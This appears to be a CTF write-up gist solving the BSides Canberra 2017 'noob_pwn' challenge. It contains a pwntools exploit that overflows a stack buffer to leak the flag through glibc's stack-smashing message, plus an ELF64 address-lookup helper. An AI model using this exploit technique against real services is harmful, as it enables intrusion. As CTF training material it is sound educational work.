@scarvell
Last active April 28, 2017 02:41
noob_pwn [150pt] BSIDESCBR2017 solution
#!/usr/bin/env python
"""
There is no ASLR for this challenge (and the binary is not PIE), so the flag string and the input buffer sit at fixed addresses
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : FULL
flag:
0x400800 ("BSIDES_CTF{FLAGISHEREONTHESERVER!}")
[mnz@noctis Downloads]$ ./noob_download
Gimme the data: asdfasdfasdfasdf
Go on then, break me: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** stack smashing detected ***: ./noob_download terminated
Segmentation fault (core dumped)
[mnz@noctis ~]$ ./noob_pwn_exploit.py
[+] Opening connection to 127.0.0.1 on port 6000: Done
[+] Receiving all data: Done (116B)
[*] Closed connection to 127.0.0.1 port 6000
Gimme the data: Go on then, break me: *** stack smashing detected *** BSIDES_CTF{d3m_st@kk_proTectionz!} terminated
"""
from pwn import *

target = remote('127.0.0.1', 6000)

# The overflow corrupts the canary, so glibc's __fortify_fail aborts with
# "*** stack smashing detected ***: <argv[0]> terminated". argv[0] is read
# through a pointer that sits above the buffer on the stack; pointing it at the
# flag string makes the abort message print the flag (no PIE, no ASLR, so both
# addresses are fixed). glibc 2.26+ no longer prints argv[0] here, so this only
# works against older libc builds.
exploit = b"TERM=abc"      # Requires TERM environment variable to be set
exploit += b"B" * 287      # Fill stack with garbage up to the argv[0] slot
exploit += p64(0x400800)   # Overwrite the argv[0] pointer with the flag's address
exploit += b"C" * 8        # Fill garbage
exploit += p64(0x601040)   # Point the environment pointer at our `TERM=abc` string
exploit += b"\n"
target.send(exploit)
print(target.recvall())
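The 0x400800 that the payload points argv[0] at is the virtual address of the flag string inside the non-PIE binary. The script below is an added example, not part of this gist or of the challenge: it parses the ELF64 program headers with only the standard library to translate the string's file offset into the address it is loaded at, which is the value the argv[0] overwrite needs. The ELF image it operates on is constructed inline by `build_sample_elf` (a hypothetical stand-in for `noob_download`, not the real binary) so that it runs offline; the flag text it embeds is the local placeholder from the docstring above.

```python
import struct

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1


def load_segments(data):
    """Return (p_offset, p_vaddr, p_filesz) for every PT_LOAD program header.

    Only little-endian ELF64 is handled, which covers the x86-64 CTF binaries
    this argv[0] trick is used against.
    """
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    # Elf64_Ehdr: e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38
    (e_phoff,) = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    segments = []
    for i in range(e_phnum):
        # Elf64_Phdr: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
        fields = struct.unpack_from("<IIQQQQQQ", data, e_phoff + i * e_phentsize)
        p_type, _flags, p_offset, p_vaddr, _paddr, p_filesz = fields[:6]
        if p_type == PT_LOAD:
            segments.append((p_offset, p_vaddr, p_filesz))
    return segments


def file_offset_to_vaddr(segments, offset):
    """Map a file offset to the virtual address it is loaded at, or None if no segment covers it."""
    for p_offset, p_vaddr, p_filesz in segments:
        if p_offset <= offset < p_offset + p_filesz:
            return p_vaddr + (offset - p_offset)
    return None


def find_string_vaddr(data, needle):
    """Virtual address of the first occurrence of `needle` in a loaded segment, or None.

    For a non-PIE executable this is the run-time address that goes into the
    argv[0] overwrite; for a PIE the program headers are 0-based, so the
    leaked load base must be added.
    """
    offset = data.find(needle)
    if offset < 0:
        return None
    return file_offset_to_vaddr(load_segments(data), offset)


def build_sample_elf(flag, base=0x400000):
    """Construct a minimal ELF64 image with one PT_LOAD segment containing `flag`.

    This is a constructed stand-in for the challenge binary so the example runs
    offline; it is not a runnable executable.
    """
    body = b"\x00" * 0x10 + flag + b"\x00"      # padding, then the flag as in .rodata
    total = 64 + 56 + len(body)                 # Ehdr + one Phdr + body
    ehdr = bytearray(64)
    ehdr[:4] = ELF_MAGIC
    ehdr[4], ehdr[5], ehdr[6] = 2, 1, 1         # ELFCLASS64, ELFDATA2LSB, EV_CURRENT
    struct.pack_into("<HHIQQQIHHHHHH", ehdr, 0x10,
                     2, 62, 1,                  # e_type=ET_EXEC, e_machine=EM_X86_64, e_version
                     base + 120, 64, 0, 0,      # e_entry, e_phoff, e_shoff, e_flags
                     64, 56, 1, 64, 0, 0)       # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack("<IIQQQQQQ", PT_LOAD, 5, 0, base, base, total, total, 0x1000)
    return bytes(ehdr) + phdr + body


# Constructed sample input (hypothetical; not the real noob_download binary).
SAMPLE_ELF = build_sample_elf(b"BSIDES_CTF{FLAGISHEREONTHESERVER!}")

if __name__ == "__main__":
    addr = find_string_vaddr(SAMPLE_ELF, b"BSIDES_CTF{")
    print("flag string loaded at %#x" % addr)
    # struct.pack("<Q", addr) is the stdlib equivalent of pwntools' p64(addr)
    print("argv[0] overwrite bytes:", struct.pack("<Q", addr).hex())
```

Against a real target replace `SAMPLE_ELF` with `open("./noob_download", "rb").read()`; the address returned for a non-PIE binary is exactly what `p64()` packs into the payload, while for a PIE build `load_segments` yields 0-based addresses and a separate leak of the load base is needed before the overwrite is useful.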